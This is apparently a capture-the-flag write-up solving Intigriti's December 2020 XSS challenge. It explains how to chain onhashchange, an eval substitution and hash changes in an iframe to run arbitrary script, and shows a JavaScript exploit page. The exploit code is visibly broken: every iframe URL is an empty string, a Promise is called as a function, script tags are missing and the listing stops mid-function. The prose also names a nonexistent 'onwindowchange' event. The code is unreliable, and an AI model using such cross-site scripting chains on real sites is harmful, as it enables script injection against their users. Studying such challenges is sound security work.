Solution to Intigriti’s December 2020 XSS Challenge

The solution below is the intended one and makes use of the ability to run arbitrary code using the below line:

// script.js line 6
var operation = `${num1}${operator}${num2}`;

We use the ability to register onwindowchange event on the window embedded as an iframe. And run arbitrary code by changing the hash of the url. This works well as the iframe will not load the page on a hash change.

<!DOCTYPE html>

  <iframe id="ifr0" width="900" height="900"></iframe>
    let wait = new Promise(r => setTimeout(r, 800));;

    (async () => {
      let ifr0 = document.getElementById('ifr0')
      // num1=7&operator=%2B&num2=9
      console.log('step 1: start');
      ifr0.src = "" // onhashchange === init
      console.log('step 1: end');
      await wait()
      console.log('step 2: start')
      ifr0.src= ""  // calc === eval
      console.log('step 2: end');
      await wait()
      console.log('step 3: start')
      ifr0.src= "" // calc(<payload>)
      console.log('step 3: end');